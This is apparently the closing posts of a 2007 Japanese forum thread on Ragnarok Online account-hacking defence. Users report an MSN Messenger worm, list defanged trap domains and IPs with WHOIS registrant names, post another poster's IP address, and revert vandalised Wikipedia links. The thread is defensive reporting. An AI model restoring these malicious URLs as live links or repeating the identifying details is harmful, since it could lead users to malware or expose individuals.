957 名前:(^ー^*)ノ〜さん:07/07/21 17:28 ID:igEEs+zz0
確かに取締りで稼ぎにくくなった中華がそっちにまた力を入れてきているって可能性はあるけどね。

958 名前:(^ー^*)ノ〜さん:07/07/21 18:31 ID:q/3ZR/Vz0
アカハックでは無くエロサイトらしいけど騎士スレのWikiがちょっと荒らされただけ。

959 名前:(^ー^*)ノ〜さん:07/07/21 21:46 ID:Y9//bcyt0
変なのに触っちゃダメ

960 名前:(^ー^*)ノ〜さん:07/07/22 00:27 ID:EL14773z0
ちょっと切羽詰まっててあれなんだが、テンプレでかくべきなのかは、とりあえずあとで責められようか。

質問なんだが、これは何処のホストなんだ?
http://www◆aehatena-jp◆com/news/100658432/
とかいう、ソースチェッカーでみても怪しいURLはっつけていった奴のホストが
board.ly.fj.dynamic.163data.com.cn
だったんだが。

961 名前:(^ー^*)ノ〜さん:07/07/22 00:35 ID:q9XqydQ80
>>960
セキュスレへどうぞ。

>>1
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

セキュリティ対策、質問・雑談スレ2
http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

962 名前:にゅぼーん:にゅぼーん
にゅぼーん

963 名前:(^ー^*)ノ〜さん:07/07/22 10:43 ID:2WRxeHcY0
>>962
・サイトとしては安全
・エミュ鯖
・キチガイ

964 名前:(^ー^*)ノ〜さん:07/07/22 10:44 ID:y7DM3BZw0
>>962
IP : 124.44.167.179
z179.124-44-167.ppp.wakwak.ne.jp

通報しました。

965 名前:(^ー^*)ノ〜さん:07/07/22 10:48 ID:dzFc0b1D0
>>962
ぷげら、962のリアル人生オワタw

966 名前:(^ー^*)ノ〜さん:07/07/22 10:51 ID:j3ZM7qJ+0
あぼーん対象に触りすぎなんじゃない?

967 名前:(^ー^*)ノ〜さん:07/07/22 14:51 ID:VDGqrRv50
spam行為はISP全般に嫌われている事だし。

968 名前:(^ー^*)ノ〜さん:07/07/22 14:59 ID:lxkbmnmh0
でも嫌われてるのに長々触ってるのもいいこととはいえんよね。

969 名前:(^ー^*)ノ〜さん:07/07/23 12:15 ID:p71RNcfJ0
MSN経由で感染するキーロガータイプ?の新種が出回ってる模様
マシンが乗っ取られるとpic.pifを実行するアドレス偽装サイトに飛ぶように
無言のアドレスを本人がサインインしていないときに相手に送りつける模様
MSNのパスとIDを打ち込み無しでも盗む様子。
知り合いがかかった。注意すべし。トレンドマイクロにファイル送付予定

970 名前:(^ー^*)ノ〜さん:07/07/23 12:28 ID:kCweh4Tu0
怖いなぁ、それに対する具体的な対策とかはどうすれば良いんだろう…

971 名前:(^ー^*)ノ〜さん:07/07/23 12:43 ID:zqTZbU9T0
MSNってなんだっけ・・・。

972 名前:(^ー^*)ノ〜さん:07/07/23 12:55 ID:UH+rS5fn0
The Microsoft Network

973 名前:(^ー^*)ノ〜さん:07/07/23 12:57 ID:p71RNcfJ0
メッセンジャー=MSN
ROユーザーで使ってる奴も多いんじゃない?
誤クリックしてHP飛んでももDLしますか?と聞いてくるから
大丈夫だとはおもうけど亜種臭いのでまだ解らない。
知り合いが感染に気づいてないと本人になりすまして
自動でハックアドレス貼ってくるから「何かチャットで発言した?」
と思わず貼られたアドレスをクリックしてしまうので注意が必要。
(たぶんそれが一番の狙い)

974 名前:(^ー^*)ノ〜さん:07/07/23 13:04 ID:UH+rS5fn0
MSN = ttp://jp.msn.com/

だろ。

975 名前:(^ー^*)ノ〜さん:07/07/23 13:32 ID:zqTZbU9T0
ああ、メッセのことか。
あんまり使ってないけどそれは怖いな。

976 名前:(^ー^*)ノ〜さん:07/07/23 15:16 ID:p71RNcfJ0
まあでもMSNの仲間内までこんな方法で感染すると考えてる奴いないからなあ・・
マジでこの感染方法考えた奴は怖いw;人の真理を見事に突いてる。
乗っ取ったPCからまるで本人が配信しているようにウィルスをばらまく。
mixiやIRCでも同じ方法を考える奴が表れるかもしれん。
http://www.pwblog.com/user/igtmtakan_if/if001/32932.html
どうもこの亜種と睨んでるがさっぱりわからん・・・;

977 名前:にゅぼーん:にゅぼーん
にゅぼーん

978 名前:(^ー^*)ノ〜さん:07/07/23 19:38 ID:PoV7Iinn0
MSN=メッセンジャーではなく、本来はMSによるネットワークサービスの総称。
過去にはISP事業も行っていた。
だから、IMの意味として使うと混乱を生じる。
もっとも、新たなサービス提供と合わせて、Windows Live系列に統合することによって、名称の混乱を払拭しようともしているようだが。

979 名前:(^ー^*)ノ〜さん:07/07/23 20:31 ID:UfD8mKHP0
デフォでデスクトップにあるMSNアイコンがまた鬱陶しかったんだよな

980 名前:(^ー^*)ノ〜さん:07/07/24 07:36 ID:AJrqvpEY0
>>976
IRCやICQで昔からあったよ。
日本では最近になって踏んだ奴が多いようで目立つけど。
ちなみにWarezovやStrationと呼ばれている奴ね。
これは最初はメールだったけどSkypeも使うようになって、
Messengerまで使うのは比較的最近かなぁ。
ま、アカハックとは関係無いです。

981 名前:(^ー^*)ノ〜さん:07/07/24 08:38 ID:7HZSr4hQ0
リネージュ資料室によると
株式関連のモーニングスターHPのTOPにアカハックの罠が仕込まれたらしい。
いよいよ無差別化してきたな。

同時の4つの罠ドメイン

www■i520i■com Expiration Date ................. 2008-06-07 17:30:06
www■sunwayto■com Expiration Date ................. 2008-06-10 02:58:50
www■clublineage■com Expiration Date ................. 2008-07-04 10:47:17
www■sakerver■com Expiration Date: 2008-06-23


上3つはおなじみ福建人か、またドメイン取り捲りモードに入ったようだよ。

Registrant Name ................. zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 610000
Registrant Country Code ......... CN

一番下のだけ情報が違うが福建竜岩は同じ、郵便番号も正しい。
Registrant:
guo yongkai
Fujian longyan
364000

982 名前:(^ー^*)ノ〜さん:07/07/24 11:24 ID:u16Zfj1s0
MSNのISP事業か・・・スーパーぼったくりだったよなぁ
定額制がなかった時代でも、従量制にしてはえらく高かったような

983 名前:まと ◆sp4Sh9QXGI:07/07/24 16:09 ID:F6ykbukN0
まとめサイト更新しましたー。
またドメイン取得祭りですかと。
pingを送信していましたら
www■motewiki■net   220.166.64.194
www■lavedoor■com   220.162.244.52
でした。これまでに見たことのないIPです。
何処かの業者の新IPか、また別の業者なのかは定かではありません。

まだ新スレ依頼が出ていないようですが、
テンプレは今までと同様で良いようであればいってきます。

984 名前:(^ー^*)ノ〜さん:07/07/24 18:38 ID:gKoWkfDO0
>>946
おかげさまで無事除去完了したし、しばらく様子見てもハックされた様子も無く順調に動いてくれてます。
遅くなったけど本当にありがとうございました。

985 名前:(^ー^*)ノ〜さん:07/07/24 20:01 ID:aV77WY4/0
そういや、テンプレ話し合うの忘れてたね。次スレに間に合わなくても困るので、そのままで依頼お願いします。

修正箇所はゆっくり検討しましょうや。こことセキュスレの使い分けとかの辺りも、詰めといた方がいいだろうし。

986 名前:(^ー^*)ノ〜さん:07/07/24 21:15 ID:sMPBg+3g0
ttp://rosafe.rowiki.jp/ の扱いは、結局どーなったんだっけ?

987 名前:(^ー^*)ノ〜さん:07/07/24 23:30 ID:aV77WY4/0
>>986
セキュスレのテンプレについて話し合われた事をまとめてみよう状態で止まっている。
箇条書きまえでゃできているが、取捨選択と文面のまとめを誰もやろうとしないので保留のまま。

988 名前:(^ー^*)ノ〜さん:07/07/25 11:05 ID:0VlfI5tA0
セキュスレのまとめサイトなのに管理人がいないwikiって一番危険だろw

989 名前:(^ー^*)ノ〜さん:07/07/25 11:21 ID:ivXIeZ350
弓手Wikiの人が設置してくれてる分だから、管理人不在でもそこいらのWikiよりは
設定はしっかりしてると思う。

テンプレWikiは設置後に多少手を加えたんだが、他に修正入れてたのが一人か二人のようで
他に編集者が来ないか待ってて今に至る、って状態。

個人の意思で勝手に決めれるものでも無いし、もっと人が居ないと手が出しにくい。
他に手を加えてた人も同じ状態なんじゃないかねぇ……

990 名前:(^ー^*)ノ〜さん:07/07/25 12:23 ID:86e/5CNx0
>>989
( TT)/\(TT )ナカマッ!!

991 名前:(^ー^*)ノ〜さん:07/07/25 16:52 ID:2b5UD1Ec0
スレ終わりそうだけど書き込んでいいのかな…;

【  アドレス   】 http://www■blog-ekndesign■com/wiki/
【気付いた日時】 今日の16:00頃
【     OS    】 WinXP Pro SP2
【使用ブラウザ 】 Sleipnir 2.5.12 IEエンジンで、IEは6.0です
【WindowsUpdateの有無】 多分今月頭
【 アンチウイルスソフト 】 NOD32
【その他のSecurty対策 】 Ad-Awareの無料版
【 ウイルススキャン結果】 現在スキャン中
【スレログやテンプレを読んだか】 テンプレと>>588前後を読みました
【hosts変更】無
【PeerGuardian2導入】無
【説明】
wikipediaのROアニメの項目の一番下、公式サイトへのリンクをクリックした直後、
『公式アドレスの最後が/wiki/っておかしくない…?』と思ってサイトが表示される前に中止ボタンを押し、
ソースチェッカーオンラインにかけたところ危険URLだと表示されたのでLANコードを引っこ抜きました。
(なのでwikipediaの編集方法がわかる方、該当アドレスを正しいものに直していただければ幸いです)

幸いROを起動しておらず、2PC環境もあるのですぐ各種パス変更して比較的落ち着いていられますが
やはり油断は大敵…怖いですね;

992 名前:アカハックスレ依頼2/7:07/07/25 17:08 ID:1g/DSBnN0
【一般的話題用】
セキュリティ対策、質問・雑談スレ2
 http://enif.mmobbs.com/test/read.cgi/livero/1177485590/

【過去スレ】
アカウントハック総合対策スレ6
 http://gemma.mmobbs.com/ragnarok/kako/117/1173963316.html.gz
アカウントハック総合スレ 5
 http://gemma.mmobbs.com/ragnarok/kako/117/1170419695.html.gz
アカウントハック被害報告スレ4
 http://gemma.mmobbs.com/ragnarok/kako/116/1164984508.html.gz
アカウントハック被害報告スレ3
 http://gemma.mmobbs.com/ragnarok/kako/116/1160787177.html.gz
アカウントハック被害報告スレ2
 http://gemma.mmobbs.com/ragnarok/kako/114/1147966576.html.gz
アカハック被害報告スレ
 http://gemma.mmobbs.com/ragnarok/kako/107/1075385114.html.gz

【参考アドレス】
・ROアカウントハック報告スレのまとめ?サイト
 http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
 http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
 http://lineage.nyx.bne.jp/

【このスレでよく出てくるアプリケーション】
・PeerGuardian2
 http://sky.geocities.jp/vs_ro_hack/pg2.htm

【PCにウィルス対策ソフトを導入してない方へ】
・Kaspersky Internet Security 試用版
 http://www.just-kaspersky.jp/products/try/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
 http://www.kaspersky.co.jp/scanforvirus/
・NOD32アンチウイルス体験版
 http://www.canon-sol.jp/product/nd/trial.html

993 名前:(^ー^*)ノ〜さん:07/07/25 17:09 ID:ivXIeZ350
別PCからのPASS変更も済んでるようだし、念のために各種スキャンでPCをチェック、だね。
Wikipeidiaは確かに罠アドレスだったけどリロードしたら直ってたので、誰かが修正してくれた模様。

それとテンプレの件、セキュスレと>986のWikiで編集作業やってます。
手の開いてる人の協力をお願いしたい所。
スレが埋まりそうなので、次スレのテンプレは現スレと同じもので依頼した方がよさげだけど……

994 名前:(^ー^*)ノ〜さん:07/07/25 17:13 ID:/lphdc/e0
>>991
見に行ったら変更が取り消されて元に戻ってたよ。
過去にも3回ぐらい書き換えられては取り消されてるっぽい。

垢ハックアドレスに書き換えた編集者のIPは例によって福建人だな。
よくもまあこんなところにまで…と胸糞悪いやら呆れるやら。

995 名前:(^ー^*)ノ〜さん:07/07/25 17:22 ID:1g/DSBnN0
番号踏んではないが依頼いってきた、そしてこっちに1回誤爆しちまったorz
ついでに誘導
【一時】新スレ遅延時避難スレ('07/05/17)【誘導】
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1179347203/

996 名前:(^ー^*)ノ〜さん:07/07/25 17:33 ID:8FZGUwLA0
>>991の件、同一IPユーザーによる改竄と、恐らく同一と思われる別IPの記録を辿って、残っている場合はrevertしてみた。
以下、改竄の行われた形跡のある項目。

利用者名: 222.78.82.107
* リネージュ
* RAGNAROK THE ANIMATION
* ガンホー・オンライン・エンターテイメント

利用者名: 222.78.80.148
* 新潟県中越沖地震
* Template:訃報
* RAGNAROK THE ANIMATION
* ラグナロクオンライン
* TAKAみちのく

単発的な改竄に終わらない可能性も高いし、管理サイドに投稿ブロック依頼、できれば163data.com.cnを対象とした
広域ブロックも検討してもらう方向で動こうかと思う。

997 名前:(^ー^*)ノ〜さん:07/07/25 17:38 ID:ivXIeZ350
次スレ

アカウントハック総合対策スレ8
http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/l50
http://gemma.mmobbs.com/test/read.cgi?bbs=ragnarok&key=1185352481&ls=50

998 名前:(^ー^*)ノ〜さん:07/07/25 18:00 ID:6BzbJZEz0
Wikipediaもか・・・あそこはそれなりに厳戒だから対応してくれそうだな。
アクセスログのはっきりとした証拠もあるし。

999 名前:(^ー^*)ノ〜さん:07/07/25 18:07 ID:N0yQL3A40
ハハハ                             イキデキネーヨ
   ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄   ハライテ-       ゲラゲラ
   ( ´∀`) < 糞株下がってる      ∧_∧       〃´⌒ヽ       モウ カンベン
.  ( つ ⊂ )  \_______   (´∀` ,,)、      ( _ ;)        シテクダサイ
   .)  ) )   ○   ∧_∧      ,, へ,, へ⊂),     _(∨ ∨ )_     ∧_∧ ○,
  (__)_)  ⊂ ´⌒つ´∀`)つ    (_(__)_丿      し ̄ ̄し     ⊂(´∀`⊂ ⌒ヽつ
          タッテ ラレネーヨ

1000 名前:(^ー^*)ノ〜さん:07/07/25 18:14 ID:cFU7+pTX0
アカウントハック総合対策スレ8
(p)http://gemma.mmobbs.com/test/read.cgi/ragnarok/1185352481/l50
(p)http://gemma.mmobbs.com/test/read.cgi?bbs=ragnarok&key=1185352481&ls=50

1001 名前:1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


全部 最新50
DAT2HTML 0.34a Converted.